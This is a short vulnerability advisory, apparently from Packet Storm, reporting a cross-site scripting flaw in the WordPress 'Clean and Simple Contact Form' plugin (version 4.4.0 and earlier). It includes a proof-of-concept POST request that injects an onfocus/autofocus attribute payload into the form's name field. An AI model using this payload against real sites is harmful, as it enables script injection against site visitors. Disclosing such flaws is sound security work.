WordPress Clean And Simple Contact Form 4.4.0 XSS

2014-11-04T00:00:00
ID PACKETSTORM:128957
Type packetstorm
Reporter Ajin Abraham
Modified 2014-11-04T00:00:00

Description

                                        
                                            `Author : Ajin Abraham  
Author Website: http://opensecurity.in  
  
Affected Product: WordPress Clean and Simple Contact Form  
Affected Version: <= 4.4.0  
Vendor: Meg Nicholas  
Vendor URL:  
http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/  
WP Plugin URL:  
https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/  
  
PoC:  
  
Make a POST request to the page containing the contact form generated by  
"Clean and Simple Contact Form"  
with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x="  
  
POST http://localhost/contact-us/  
cscf[name]=" onfocus=alert(1) autofocus x="  
  
  
  
*Regards,Ajin*  
`